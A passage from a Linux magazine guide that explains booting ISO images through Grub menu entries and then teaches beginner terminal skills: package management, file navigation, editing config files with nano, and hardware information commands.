The kernel setting translates to the Linux option in Grub with the addition of (loop) to the path. Similarly, the initrd part of the append line corresponds to Grub's initrd line. The rest of the append line is added to the Linux line along with the iso-scan option. This approach will work with most distros based on Ubuntu, although some have removed the ISO booting functionality for some reason. It's possible to add this back, as we will see shortly.

Other distros
There's no standard for booting from an ISO image; each distro implements it differently, or not at all. For example, to boot an Arch-based ISO you need something like this:
submenu "Arch Linux" {
  set device=/dev/sde1
  set isofile=/Arch/archlinux-2016.09.03-dual.iso
  set isolabel=ARCH_201609
  loopback loop $isofile

  menuentry "Arch Linux" {
    linux (loop)/arch/boot/x86_64/vmlinuz img_dev=$device img_loop=$isofile archisolabel=$isolabel archisobasedir=arch earlymodules=loop
    initrd (loop)/arch/boot/x86_64/archiso.img
  }
}
As you can see, dealing with this distro is a little different as it requires more than the path to the ISO file. It also requires the filesystem label of the ISO and the device node for your USB stick. The first can be found with the isoinfo or iso-info command - you'll have at least one installed if you have a DVD writer - in this way:
$ isoinfo -d -i /path/to/image.iso
or
$ iso-info -d -i /path/to/image.iso
The device node is trickier since it will vary according to what you plug the stick into. The simplest solution is to give the USB stick's filesystem a label, which is why we added one when we created the filesystem. If your filesystem currently has no label, you can add one with either:
$ fatlabel /dev/sde1 MULTIBOOT
or
$ e2label /dev/sde1 MULTIBOOT
depending on the filesystem type you chose. You can also read the label, if you're not sure what it's currently set to, by using one of the above commands without specifying a label. Now you can refer to the disk by label in the Grub menu with
device=/dev/disk/by-label/MULTIBOOT
and it will be found no matter what device name it is given.

Many distros
There are other variations on the menu options for various distros; we've supplied a load here: www.linuxformat.com/files/code/tggl5.boot.zip. Just edit them to suit the versions of the ISO images you are using. So far, we have modified the main grub.cfg file for each ISO we have added, but that can get a bit messy when you have more than a couple of distros, and editing it to remove older versions can also be a source of errors. It would be nice if we could update the menus automatically—and we can. Instead of adding the information to the main menu, put each distro's menu details in a file in the same directory as the ISO image; let's call it submenu. Now we can use Grub's ability to include information from other files in its menu to build a menu. Create a file in the root of the USB stick called updatemenu, containing this:
#!/bin/sh
cd $(dirname $0)
sudo grub-mkconfig 2>/dev/null | sed -n '\%BEGIN /etc/grub.d/00_header%,\%END /etc/grub.d/00_header%p' > boot/grub/grub.cfg
for menu in */submenu; do
  echo "source /$menu" >> boot/grub/grub.cfg
done
Make it executable and run it from a terminal after adding or removing menu entries. If you are using a FAT filesystem on the USB drive, you may need to run it like this:
$ sh /path/to/drive/updatemenu
The first line changes the directory to the location of the script, so it's important to put it in the root of the flash drive. The next line extracts the header portion of the default grub.cfg, then the for loop adds each of the individual submenus. The distros are added in alphabetic order; if you want to force a particular order, start each directory's name with a number: 01_Ubuntu, 02_Fedora and so on. This changes the order but not the names displayed - those are set by the submenu command at the top of each section.

Getting tricky
What do you do if you want to boot an ISO for which we don't have a recipe? You could try a web search, but if that doesn't show up anything useful, you can examine the ISO's boot process directly. Almost all Linux distros use an initramfs to

> If you want, you can tweak your menus. The Grub online manual shows all the options. The SystemRescueCd example on the DVD uses one such command to only show the 64-bit options when relevant.

boot. This is a compressed file containing a small root filesystem that takes care of loading any necessary drivers and then mounting the real root filesystem before passing control to it. The kernel mounts this filesystem and then looks for a script called init in it (no, I'm not repeating myself there). This is where the magic of loading the live CD's filesystem from the DVD or ISO happens. If you examine this script - you will need a basic understanding of shell scripting here - you can often see what kernel parameters it is looking for to boot from the ISO. To do that you need to unpack the initramfs file, which is a compressed CPIO archive. First, you will need to identify the type of compression used with the file command—never trust a filename extension to give the right format:
$ file /path/to/initramfs.img
Then you can unpack it to the current directory with one of the following:
$ zcat /path/to/initrd.img | cpio -id
$ bzcat /path/to/initrd.img | cpio -id
$ xzcat /path/to/initrd.img | cpio -id
for images compressed with gzip, bzip2 and xz respectively. You can also modify the initrd by making your changes to the unpacked filesystem and then repacking it by executing this command in the directory to which you unpacked the initrd in the first place:
$ find . | sudo cpio --create --format='newc' | gzip > ../myinitrd.img
Once you've a custom initramfs, you don't need to modify the original ISO image to use it. Simply put your new initrd on your USB stick and reference it from the menu, like this:
linux (loop)/path/to/vmlinuz...
initrd /distrodir/myinitrd.img
Alternatively, if you want to boot such a distro that has already appeared on an LXFDVD, you can 'borrow' the lxfinitrd file from there. The init process doesn't change much, so you will often find that it works even with a newer release of the distro.
Because the modified initrd is saved separately from the ISO image and referenced only from the menu on your USB stick, you can distribute your USB stick without breaking the rules some distros have about redistributing modified versions of their software. You could, for example, create a multi-distro installer USB stick complete with themed Grub menus and themed distro splash screens (these are in the initrd too) to hand out at a Linux installfest.

More options
While you are creating the menu, you can add extra kernel options to suit your needs, e.g. the SystemRescueCd boot process pauses for you to select a keymap. Adding setkmap=uk will skip the pause and load a UK keymap. Similarly, you can set the root password with rootpass. Other distros have their own options like these, along with the general kernel configuration options that are documented in Documentation/kernel-parameters.txt in the kernel source (there's a copy on each LXFDVD). We've included a number of submenu files on the DVD; just copy the relevant directory to the root of your USB device and add the ISO image file. If there are 64- and 32-bit versions of a distro, we've named the 32-bit version submenu32 - rename it accordingly. ■

Booting an ISO from hard disk
You can also use this method to boot an ISO image from your hard disk. Why would you want to do this? If you are sufficiently paranoid/cautious, you may prefer to have a rescue CD always available. Dropping an ISO into /boot and adding a suitable menu entry means you will always have one without having to hunt for the appropriate CD or USB stick. If you put the submenu entry in /etc/grub.d/40_custom, it will be added to the end of the menu automatically, whenever you run update-grub or grub-mkconfig.
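Pulling the boxout's advice together with the Ubuntu stanza shown earlier, a hard-disk version of the entry might look something like the sketch below. The path /boot/isos/ubuntu-16.04-desktop-amd64.iso and the menu title are our own example choices rather than anything prescribed by the article - adjust them to wherever you actually keep the image, and remember to run update-grub (or grub-mkconfig) afterwards:
# appended to /etc/grub.d/40_custom
menuentry "Ubuntu 16.04 ISO (rescue)" {
  set isofile=/boot/isos/ubuntu-16.04-desktop-amd64.iso
  loopback loop $isofile
  linux (loop)/casper/vmlinuz.efi boot=casper iso-scan/filename=$isofile quiet splash ---
  initrd (loop)/casper/initrd.lz
}
If /boot lives on its own partition, drop the leading /boot from the isofile path, since Grub paths are relative to the partition it reads them from.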

[Screenshot: the "Parse command line options" block of a distro's init script, which loops over the entries in /proc/cmdline to pick up options such as root=, rootfstype= and loop=]
> Examining the init file in the ISO's initrd file can reveal extra options available to the boot menu.


The terminal
Feel like a 1337 hacker and get to
grips with the powerful terminal.
126 Get started
The best way to use the terminal is to dive
in with both feet and start using it.

128 Files and folders


We explain how you can navigate the file
system and start manipulating things.

130 Edit config files


Discover how you can edit configuration
files from within the text terminal.

132 System information


Interrogate the local system to discover all
of its dirty little secrets.

134 Drive partitions


Control, edit and create hard drive
partitions and permissions.

136 Remote access


Set up and access remote GUI
applications using X11.

138 Display control


Sticking with the world of X11 we take
some randr for resolution control.

140 Core commands


20 essential terminal commands that all
Linux web server admins should know.


Terminal: How
to get started
It's time to flex your fingers and dive head first into the inky darkness of the
terminal to see how you can start handling the commands.

The terminal is an incredibly important part of your Linux desktop. It doesn't matter how wedded you are to point and click over the command line, at some point you're going to have to dip your toe in the terminal's dark expanse and use it. Don't worry, though, because the terminal isn't as scary as it might appear, and if you take the time to learn the basics you'll discover it can be a far quicker and more effective way of getting certain tasks done.
As you'd expect, a terminal effectively gives you access to your Linux shell, which means it works in exactly the same way, using the same language (Bash). This means you can do anything in the terminal you'd normally do at the command line, all without leaving the relative comfort of your desktop. That makes learning how to use the terminal - and Bash - doubly advantageous, as it gives you your first glimpse into working with the underlying Linux shell. And over the next few articles that's exactly what you're going to learn - how to get to grips with the terminal.
We're basing this tutorial on Ubuntu, so start by opening the Dash and typing 'terminal' into the search box. You'll find the terminal of course, but you'll also see two entries called UXTerm and XTerm too. This highlights the fact there are multiple terminal emulators that you can run in order to interact with the shell. There are differences between them, of course, but fundamentally they do the same thing.
For the purposes of this tutorial we're sticking with the default terminal, which is basically the gnome-terminal emulator - technically it's emulating a TeleTYpe (TTY) session. It has all the functionality you'll need, but both XTerm and UXTerm are worth noting because, although they are more minimalist tools, neither requires any dependencies to run. This means if anything stops the main terminal from running, you can use either as a backup. As an aside, the only difference between the two is that UXTerm supports the expanded Unicode character set.

How Bash works
The Linux shell uses the Bash shell and command language to perform tasks, and it uses a relatively straightforward syntax for each command: utility command -option.
The 'utility' portion of the command is the tool you wish to run, such as ls for listing the contents of a directory, or apt-get to trigger the APT package management tool. The command section is where you specify exactly what you want the utility to do, eg typing apt-get install instructs the package management utility to install the named package, eg: apt-get install vlc.
The -option section is where one or more 'flags' can be set to specify certain preferences. Each flag is preceded by

> If you're struggling to type the right command, you can wipe all previous actions from view simply by typing clear and hitting Enter. Note this won't affect your command history.

Speed up text entry
It doesn't matter how fleet of hand your typing skills are, the command line can still be a time-consuming, frustrating experience. Thankfully the terminal comes equipped with lots of handy time-saving shortcuts. This issue let's take a look at how you can easily access previously used commands and view suggestions:
» Up/down arrows Browse your command history.
» history Use this to view your command history.
» Ctrl+r Search command history. Type letters to narrow down the search, with the most recent match displayed, and keep pressing Ctrl+r to view other matches.
» Tab View suggestions or auto-complete a word or path if only one suggestion exists. Press ~+Tab to autofill your username, @+Tab to autofill your host name and $+Tab to autofill a variable.

> The --help flag can be used with any command to find out what it does, plus what arguments to use.



Your first terminal commands


While it's possible to install and manage software using a combination of the Software Center and Ubuntu's Software & Updates settings panel, it's often quicker to make use of the Advanced Package Tool (APT) family of tools. Here are some key ways that they can be used (see sudo use below):
» $ apt-cache pkgnames Lists all available packages from sources listed in the /etc/apt/sources.list file.
» $ sudo add-apt-repository ppa:<repository name> Adds a specific Launchpad PPA repository to the sources list.
» $ sudo apt-get update Gets the latest package lists (including updated versions) from all listed repositories.
» $ sudo apt-get install <package> Installs the named package. This will also download and install any required dependencies for the packages.
» $ apt-get remove <package> Use this to remove an installed package. Use apt-get purge <package> to also remove all its configuration files, and apt-get autoremove to remove packages installed by other packages that are no longer needed.
» $ sudo apt-get upgrade Upgrades all installed software - run sudo apt-get update before running this. Other useful apt-get commands include apt-get check, a diagnostic tool that checks for broken dependencies, and apt-get autoclean, which removes Deb files from removed packages.

> The apt-cache tool can also be used to search for specific packages or reveal a package's dependencies.
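As a quick worked example of these tools together (vlc is just the package used elsewhere in this tutorial - substitute whatever you actually want to install):
$ sudo apt-get update
$ apt-cache pkgnames | grep -i vlc
$ sudo apt-get install vlc
$ sudo apt-get remove vlc
The first command refreshes the package lists, the second checks that the package exists in your configured repositories, and the last two install and then remove it.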

one or two dashes (--), and the most useful of all is the --help option, which provides a brief description of the utility, plus lists all available commands and options, eg ls -l.
The -l flag tells the list directory tool to provide detailed information about the contents of the folder it's listing, including: permissions; who owns the file; the date it was last modified; and its size in bytes. Utilities can be run without any commands or options - eg ls on its own provides a basic list of all folders and files in a directory. You can also run utilities with a combination of commands and/or options.

Restricted access
Open the terminal and you'll see something like this appear: username@pc-name:~$. This indicates that you're logged on to the shell as your own user account. This means that you have access to a limited number of commands - you can run ls directly, eg, but not install a package using apt-get, because the command in question requires root access. This is achieved in one of two ways - if you're an administrative user, as the default user in Ubuntu is, then you can precede your command with the sudo command, eg sudo apt-get install vlc. You'll be prompted for your account password, and then the command will run. You should find that you can run more sudo-based commands without being re-prompted for your password (for five minutes) while the terminal is open. On some distros you can log on to the terminal as the root user with su - you'll be prompted for the root password, at which point you'll see the following prompt: root@pc-name:~$.
Once logged in, you can enter commands with no restrictions. We recommend you use the sudo command rather than this approach, and if you're running Ubuntu then you'll find su won't work because the root account password is locked for security reasons.
When installing some distros or adding new users to Ubuntu, you may find your user account isn't added to the sudo group by default. To resolve this, you need to open the terminal in an account that does have root access (or use the su command if supported) and type sudo adduser <username> sudo. You can also add the user to other groups with the command by listing all the groups you wish to add, eg: sudo adduser <username> adm sudo lpadmin sambashare.
Another handy tool is gksudo, which allows you to launch desktop applications with root privileges. It's of most use when wanting to use the file manager to browse your system with root access: gksudo nautilus. Make sure you leave the terminal open while the application is running, otherwise it'll close when the terminal does. When you're done, close the application window, then press Ctrl+c in the terminal, which interrupts the currently running program and returns you to the command line.
We've already discussed the --help flag, but there are other help-related tools you can use too. First, there's whatis, which you can type with any command to get a brief description of it and any specified elements, eg whatis apt-get install vlc will describe the apt-get tool, the install argument and what package vlc is. Flags are ignored.
If you're looking for a full-blown manual, then the man tool provides access to your distro's online reference manual, which is started with man intro. This provides you with a long and detailed intro to the command line. Once done, press q to quit back to the terminal. For more advice on navigating the manual, type man man or pair it with a tool, eg man ls.
Now you've taken your first steps into the world of the terminal, check out the box (Your First Terminal Commands, above) for some useful package management commands you can work with. Next issue, we'll look at how to navigate your filesystem from the terminal, plus launch programs and delve into more useful shortcuts to help speed up the way you interact with the command line. ■




Terminal:
Work with files
Turn your attention to navigating the file system and
manipulating files and folders from the beloved Terminal.

In the previous tutorial on page 158 we introduced you to some of the basics of using the Terminal. We opened by revealing it works in the same way as your Linux shell; how commands are structured (utility command -option); plus gave you the tools to manage software packages and get further help. This time, we're going to look at how you can navigate your file system, work with files and folders, and learn some more time-saving shortcuts in the bargain.
When you open a new Terminal window, the command prompt automatically places you in your own personal home folder. You can verify this using the ls command, which lists the contents of the current folder. The default Terminal application displays folder names in blue, and filenames in white, helping you differentiate between them. The ls command can be used in other ways too. Start by typing ls -a to display all files, including those that begin with a period mark (.), which are normally hidden from view. Then try ls --recursive; the --recursive option basically means that the contents of sub-folders are also displayed.
If you want more detail about the folder's contents - permissions settings, user and group owners, plus file size (in bytes) and date last modified - use ls -l. If you'd prefer to list file sizes in kilobytes, megabytes or even gigabytes depending on their size, add the -h option—so use ls -h -l instead. There are many more options for ls and you can use the --help option to list them all.
Navigating your file system is done using the cd command - to move down one level to a sub-folder that's inside the current directory use cd <subfolder>, replacing <subfolder> with the name of the folder you wish to access. Remember that folder and filenames are case sensitive, so if the folder begins with a capital letter - as your personal Documents folder does, eg - you'll get an error about the folder not existing if you type it all in lower case, eg, cd documents. You can also move down several levels at once using the following syntax: cd subfolder/subfolder2. To move back up to the previous level, use cd .. - you can also use the / character to move up multiple levels at once, eg cd ../.. moves up two levels.
What if you want to go somewhere completely different? Use cd / to place yourself in the root directory, or navigate anywhere on your system by entering the exact path, including that preceding / character to indicate you're navigating from the top level, eg cd /media/username.

> Make good use of quote (') and backslash (\) characters when folder paths contain spaces and other special characters.

Speedier navigation
In the last part we revealed some handy keyboard shortcuts to help you enter commands more quickly, but the following keys will help you navigate the Terminal itself more efficiently:
» Home/End Press these to jump to the beginning or end of the current line.
» Ctrl+left/right cursor Move quickly between arguments.
» Ctrl+u Clear the entire line to start again.
» Ctrl+k Delete everything from the cursor's position onwards.
» Ctrl+w Delete the word before the cursor.
Accidentally omitted sudo from your command? Just type sudo !! and hit Enter to repeat the last command with sudo applied to it. And if you make a typo when entering a command, instead of retyping the entire command again, just use the following syntax to correct the mistyped word (in the following example, dpkg was originally mistyped as dkpg):
^dkpg^dpkg
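Here's a rough illustration of those last two tricks (the exact error text from apt-get will vary between releases, but the idea is the same):
$ apt-get install vlc
E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
$ sudo !!
sudo apt-get install vlc
$ sudo dkpg -l
sudo: dkpg: command not found
$ ^dkpg^dpkg
sudo dpkg -l
The !! is replaced with your previous command, and ^old^new re-runs the previous command with the first occurrence of old swapped for new - Bash prints the expanded command before running it.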




Boost your learning


Now you're starting to flex your muscles in the Terminal, how about expanding your knowledge by instructing it to display information about a random command each time you open it? To do this, you need to edit a file, so open the Terminal and type the following:
nano ~/.bashrc
This opens the file in the nano text editor. Use the cursor keys to scroll down to the bottom of the file, then add the following line to it:
echo "Did you know that:"; whatis $(ls /bin | shuf -n 1)
Press Ctrl+o to save the file (just hit Enter to overwrite it), then Ctrl+x to exit nano. Now close the Terminal window and open a new one to get a brief description of a command. Just type the following, with the actual command listed, for a longer description: <command> --help.

The ~ character works in a similar way to /, except this places you in your home directory. So typing cd ~/Documents is the same as typing cd /home/username/Documents. One final trick—you've jumped to another directory, but how do you go back to the previous directory quickly? Simple, just type cd - to do so.

Working with files and folders
You can now list directories and navigate your file system, but what about doing something practical, like moving and copying files? You'll find a range of different commands exist, and the tricks you've learned about navigation will hold you in good stead here too.
Let's start by looking at commands for copying (cp) and moving (mv) files and folders. The same options apply to both commands. The basic syntax is cp/mv <source> <target>. The source and target can be complete paths following the same rules as the cd command, but it's generally good practice to first navigate to the folder containing the file or folder you wish to copy or move. Once done, you can simply specify the file or folder name as the source, like so: cp invoice.odt ~/Documents/Backup.
This creates a copy of the file with the same name. The following copies the file to the specified directory and renames it too: cp invoice.odt ~/Documents/Backup/invoice-backup.odt. If you want to create a copy of the file within the same folder, simply use cp invoice.odt invoice-backup.odt.
Substitute mv for cp in any of the above commands, and the file is moved, moved and renamed, or simply renamed. What happens if there's already a file called invoice-backup.odt in existence? It'll be overwritten without so much as a by your leave, so make sure you're asked if you want to overwrite it by adding the -i flag, like this: mv -i invoice.odt invoice-backup.odt.
You can also copy folders using the cp or mv commands. Here, you need to include the recursive option, which ensures the folder is copied across with all its contents and correctly arranged in their original locations relative to the parent folder: cp -r ~/Documents /mnt/sdb1/Backup/.
If the Backup folder exists, then the Documents folder will be recreated inside it; if not, then the Backup folder is created and the contents of the Documents folder are copied into it instead.
Use the rm command to delete a single file, eg rm invoice.odt. The rmdir command deletes folders, but only empty ones. If you want to delete a folder and all its contents, use the command rm -r foldername.
You can also create new folders with the mkdir command - simply type mkdir folder, replacing folder with your chosen folder name. Use the touch command to create an empty file, such as touch config.sys.
Wildcards are often used to speed things up in searches, and can also be applied to file commands too - the asterisk (*) character can be used to quickly access a folder with a long name, eg cd Doc*. This works fine if there's only one folder beginning with Doc, but if there are two (say Doctor and Documents), then the command would open the first matching folder, which is Doctor in this instance. To avoid this, use cd Doc*ts instead.
Two characters that are more useful when navigating are the single quotation mark (') and backslash (\) characters. Use single quotation marks around files or file paths that contain spaces, such as cd ~/Documents/'Doctor Who'. You should also use quotation marks when creating folders in this way, eg simply typing mkdir Doctor Who will actually create two separate folders called Doctor and Who, so type mkdir 'Doctor Who' to get the folder you want. You can also use the \ character to get around this too, eg mkdir Doctor\ Who works in the same way, because the \ character instructs mkdir to treat the following character (in this instance the space) as 'special'.
We finish off by revealing some handy characters that allow you to run multiple commands on a single line. The && argument does just that, so you can do the following to quickly update your repos and update all available software:
sudo apt-get update && sudo apt-get upgrade
&& is like the AND command in that the second command will only be performed if the first completes successfully. If you wanted the second command to only run if the first command failed then you'd use || instead. If you want the second command to run after the first regardless of what happens, then use the ; eg,
sudo apt-get update; sudo apt-get remove appname
instead of &&. ■

> Some file managers allow you to right-click a folder and open the Terminal at that location, but you have to manually add this option to Ubuntu's Nautilus file manager. Install nautilus-open-terminal from the Software Center, then open a Terminal window, type nautilus -q and press Enter. The option will now appear.

> Use ls to find out more about the files and folders in a current directory.


Terminal:
Edit config files
We demonstrate how the Terminal is the best place to edit your Linux
installation's configuration files and take some control.

The Terminal is one of Linux's most important tools, and however enamoured you are with your desktop's point-and-click interface, you can't avoid it forever. This series is designed to ease you gently into the world of Bash and the command line, and having introduced the basics of the Terminal in part one while exploring how to use it to navigate (and manage) your file system in part two, we're going to examine how you can use it to change key system preferences in our third instalment.
Linux stores system settings in a wide range of configuration (config) files, which tend to reside in one of two places: global config files that apply to all users are found inside the /etc/ folder, while user-specific config files usually reside in the user's own home folder or the hidden ~/.config/ folder. Most user-specific files are named with a period (.) mark at the beginning of the file to hide them from view.
These config files are basically text files, with settings recorded in such a way as to make them decipherable when read through a text editor, although you'll still need to spend time reading up on specific configuration files to understand how to tweak them. Config files are visible as plain text, so editing them is relatively simple and all you need is a suitable text editor and administrator access via the sudo command.
You might wonder why you don't simply use a graphical text editor such as Gedit. There's nothing stopping you doing this, but you'll need to launch it with admin privileges (see the box, Run Desktop Apps With Root Privileges). You don't need to exit the Terminal to edit these files, though - you'll find two command-line text editors come pre-installed on most flavours of Linux, such as vi and nano. The most powerful of the two editors is vi, but it comes with a steeper learning curve.

> Our text editor of choice for editing configuration files in the Terminal has to be the simple and straightforward nano. Yes, we know there are lots of editors.

Understanding configuration files
For the purposes of this tutorial, we're focusing on nano as it's perfect for editing smaller files, such as configuration files, and keeps things relatively simple. Use sudo nano /path/file to invoke it, eg: sudo nano /etc/network/interfaces.
You'll see the Terminal change to the nano interface - with the filename and path listed at the top, and a list of basic commands shown at the bottom - the '^' symbol refers to the Ctrl key, so to get help, eg, press Ctrl+G. Press Ctrl+X to exit and you'll be prompted to save any changes if you make them, otherwise you'll return to the familiar command line.
Your file's contents take up the main area of the nano interface - if a line is too long for the current Terminal window, you'll see a '$' symbol appear at its end - use the cursor key or press End to jump to the end of the line. Better still, resize the Terminal window to fit the line on-screen.
Navigation is done in the usual way, using cursor keys to move around your document, while Home and End are handy shortcuts to the beginning and end of the current line. Press the Page Up and Page Down keys to jump through the document a page at a time. If you want to go to the bottom of your document, press Alt+/, and Alt+\ to go back to the top.
If you want to jump to a specific section of the document, press Ctrl+W to open the search tool, then enter the text you're looking for. You'll often come across multiple matches, so keep hitting Alt+W to show the next match until you find what you're looking for. If you'd like to search backwards, press Alt+B when at the search dialog and you'll see


Run desktop apps with root privileges


One of the big advantages of using the Terminal is that it gives you the sudo command, which allows you to run programs and access the system with root user privileges. If you want to edit configuration files outside of the command line using an editor such as Gedit, you'll need to give it root privileges to access certain files. You can technically do this using sudo, but this isn't the recommended approach, because if you use sudo to launch Gedit and then edit files in your home directory, they'll end up owned by root rather than your own user account.
Instead, use the following command to launch Gedit (or indeed, any graphical application such as Nautilus) as the root user: gksu gedit. You'll see a window pop up asking for your user password. After this, Gedit will appear as normal, except you now have full access to your system.
It's a little messy - you'll see the Terminal window remains open and 'frozen' - if you press Ctrl+C, Gedit will close and you'll get back to the command line. The workaround is to open Terminal again to launch a separate window in its own process, or if you want to tidy up the screen, close the existing Terminal window using the 'x' button - select 'Close Terminal' and despite the warning, Gedit will remain running.

[Backwards] appear to confirm you'll be searching from the bottom up rather than the top down.
Configuration files vary depending on the file you're planning to edit, but share some characteristics. One of these is the use of the '#' key. If a line begins with '#', then that means the line is ignored by Linux. This is a handy way to introduce comments into your configuration files, but it can also be used to disable commands without deleting them (handy for testing purposes). Indeed, some configuration files - such as php.ini for PHP scripting - are one long list of commented-out commands and you simply remove the '#' next to those commands you want to enable, tweak them accordingly, save the file and then restart the PHP server to effect the changes.
It's also always a good idea to back up a configuration file before you edit it. This is usually done by creating a copy of the file with a .bak extension, like so:
sudo cp -i /etc/network/interfaces /etc/network/interfaces.bak
(If you remember, the -i flag prevents the file from automatically overwriting an existing file without prompting you.) If you then need to restore the backup for any reason, use the following:
sudo cp -i /etc/network/interfaces.bak /etc/network/interfaces
Type y and hit Enter when prompted and the original file will be restored, while retaining the backup copy, which will allow you to take another swing at editing it.

> Take care editing config files. Remember to always back up first, and double-check your changes and syntax before committing them.

Open a second Terminal window and type man <filename>, replacing <filename> with the file you're planning to edit, such as fstab or interfaces. You'll get a detailed description and instructions for editing the file.

Your first config edit
Let's dip our toes into the world of configuration editing by examining how you'd read and change the hostname of your system, which is used to identify it on your network. First, back up the file in question, then open it:
sudo cp -i /etc/hostname /etc/hostname.bak && sudo nano /etc/hostname
You'll see a largely blank document with a single line matching the name of your computer from your network. You need to change this to something else. Remember the rules for hostnames: they need to be a maximum of 64 characters, with letters, numbers or dashes only (so no spaces or underscores, eg).
Once done, press Ctrl+X, typing y and hitting Enter when prompted. If you now type hostname and hit Enter, you'll see your hostname has been updated to the contents of the file. However, if you leave things as they are, you'll start getting 'unable to resolve host' errors and you will need to use sudo nano /etc/hosts and update the reference next to 127.0.0.1 to point to your hostname too.
This is a basic edit of a configuration file, so let's try something a little more daring:
sudo cp -i /etc/default/grub /etc/default/grub.bak && sudo nano /etc/default/grub
This change to the config file enables you to make changes to the Grub bootloader settings. If you have a dual-boot setup, you might want to change the default OS that boots when you don't select an option at the Grub menu. This is controlled by the GRUB_DEFAULT= line and by default this is set to the first entry in the list (marked with a zero), but you can set it to another entry by changing this number, eg GRUB_DEFAULT="1".
Alternatively, why not set Grub to default to the last entry that you chose? This is useful if you spend long amounts of time in one operating system before switching to another for a period of time. To do this, you need to change the GRUB_DEFAULT line thus: GRUB_DEFAULT="saved". You also need to add the following line immediately below it: GRUB_SAVEDEFAULT="true".
Other lines that are worth examining include GRUB_HIDDEN_TIMEOUT. If you only have a single operating system installed, this should be set to GRUB_HIDDEN_TIMEOUT="0", indicating the Grub menu remains hidden and boots to the default OS after 0 seconds. And if Grub is set to appear, you can alter the length of time that the Grub menu is visible before the default OS is selected via the GRUB_TIMEOUT= setting, which measures the delay in seconds (and is 10 by default).
When you have completed all your tweaking, remember to save the file and exit nano, then type sudo update-grub and hit Enter, so when you reboot your changes can be seen in the boot menu. ■
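To put those settings in context, here's a minimal sketch of how the relevant lines of /etc/default/grub might read after the 'remember my last choice' tweak described above - the rest of the file, and the exact defaults, will vary between installations:
GRUB_DEFAULT="saved"
GRUB_SAVEDEFAULT="true"
GRUB_TIMEOUT="10"
Save the file, run sudo update-grub and the new behaviour takes effect at the next reboot.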


Terminal:
Get system info
We discover how to get useful information about the Linux system
and its hardware with the help of the Terminal.

Regardless of what desktop you use, beneath it all lies the shell, a command-line interface that gives you unparalleled access to your PC. In this series, we're exploring different ways in which you can immerse yourself in the Terminal by learning practical new skills and in this tutorial, we'll cover how to get key information about the inner workings of a system running Ubuntu (or another Debian-based distribution (distro)).
There are plenty of system information tools accessible through your Unity desktop environment, but they're scattered here and there, and rarely offer much in the way of detailed information. By contrast, the Terminal offers a number of useful commands that give you lots of detail you're missing from the Unity desktop.
The first tool worth looking at is hwinfo. Note: this has been deprecated, but can still provide a useful summary of the hardware attached to your system, particularly when you pair it with this flag: hwinfo --short. When used, you'll see a handy list of your hardware: its type followed by a description that usually includes manufacturer and model. Now let's delve deeper.
There are a number of commands prefixed with ls that provide all the detail you need about your system. The first is the universal lshw command, which provides every scrap of detail you might (or might not) need about your system. Note it needs to be run as an administrator, so invoke it using sudo, eg sudo lshw. You'll see various parts of your Linux box are scanned before a lengthy - and seemingly exhaustive - list of system information is presented. Trying to digest all of this at once can be tricky, but you can output this information as a HTML file for reading (and searching) more easily in your web browser with sudo lshw -html > sysinfo.html.
The file will be generated wherever you currently are in the Terminal and in your Home folder by default. Like hwinfo, it can also provide a more digestible summary via sudo lshw -short. This basically provides a table-like view of your system, with four columns to help identify your hardware: H/W path, Device, Class and Description.

> Want a detailed summary of your system's makeup? Try outputting lshw to a HTML file to make it readable via your favourite web browser.

The ls family
If you're looking for targeted information about a specific part of your computer, you'll want to look into other members of the ls family. Start with the lscpu command, which provides you with detailed information about your processor, including useful snippets, such as the number of cores, architecture, cache and support for hardware virtualisation.
Next up are your storage devices and you can start by trying lsblk. This will list all of your block storage devices, which covers your hard drives, DVD drives, flash drives and more. Key information includes each device's 'name' (basically information about the physical drive and its partitions - sda and sdb1 etc), size, type (disk or partition, but also 'rom' for CD and 'lvm' if you have Logical Volume Management set up) and where the drive is mounted in the Linux file system (its 'mountpoint'). Note too the 'RM' field. If this is 1, it indicates that the device is removable. The list is displayed in a tree-like format—use lsblk -l to view it as a straightforward list. By default, the drive's size is given in 'human readable' format (G for gigabytes and M for megabytes etc). Use lsblk -b to display these figures in bytes if required. If you have SSDs attached, use the -D flag to display support for TRIM (as well as other discarding capabilities). If you want information about your drives' filesystems, type lsblk -f and it'll also
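If you only need a handful of those columns, it's worth knowing that lsblk can also be told exactly what to print: its -o flag takes a comma-separated list of column names. A typical invocation (the column choice is just an example) might be:
lsblk -o NAME,SIZE,FSTYPE,TYPE,MOUNTPOINT
Run lsblk --help to see the full list of column names it understands.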


Get driver information


Most hardware issues can usually be traced to drivers, and Linux is no exception. We've seen how the lspci -v command can reveal which driver (or module) is linked to which device. Another tool for displaying these modules is lsmod, which displays a comprehensive list of all modules that are currently in use. The 'Used by' column lists which hardware devices each module is linked to—multiple entries are common because some drivers come in multiple parts (your graphics card requires drivers for the kernel and X server, eg).
Armed with a combination of lspci -v and lsmod you can identify which particular module is being used by a specific hardware device. Once you have the module name, type the following to learn more about it: modinfo <module>. Replace <module> with the name listed under lsmod (or 'kernel driver in use' if you're using lspci). This will display information about the driver filename, its version and licence. Other useful fields include author and description, plus version number.
One likely exception to this rule is your graphics driver if you've installed proprietary ones. If modinfo returns an 'Error not found' message, then the listed module is an alias—to find the correct module name, type sudo modprobe --resolve-alias <module>, then use the result with modinfo, which should now work correctly.
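As a concrete illustration (the module name here is just an example - substitute whichever driver lsmod or lspci reports on your own machine), the pairing looks like this:
lsmod | grep nouveau
modinfo nouveau
The first line checks whether the open-source Nvidia driver is currently loaded; the second prints its filename, version, licence, author and parameters.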

display the drive's label and its UUID. The UUID is often used when configuring drives to automatically mount at startup via the /etc/fstab file. You can also gain insights into each drive's owner, group and permissions (listed under 'mode') using the -m flag. These work in a similar way to the ls command (see Linux Format 210), but reveal insights at the top level. You can also sort the drive list by different columns using the -x switch - eg to list drives in size order (smallest drive first), type: lsblk -x size.

Working with Fdisk
The fdisk command is traditionally used to change partition tables, but pair it with the -l switch and it can also display more detailed information about a particular drive. Use it in conjunction with a drive's identifier (/dev/sda for an entire disk, /dev/sda1 for a partition), eg sudo fdisk -l /dev/sda.
This will list the device identifier, its start and end points on the disk (or partition), the number of sectors it has and its size, plus - a crucial bit of information - the partition type. This is quite descriptive, helping you identify which partitions are which (and particularly useful when examining a dual-boot setup involving Windows partitions).
Partitions are listed in the order they were created, not their physical position on the drive—look for the 'partition table entries are not in disk order' message if this is the case. Examine the Start and End columns carefully to work out where each partition physically resides on the disk.
Two further commands - lspci and lsusb respectively - provide you with detailed information about other hardware devices. The lspci command focusses on internal hardware, while lsusb looks at peripherals connected to (wait for it) your PC's USB ports.
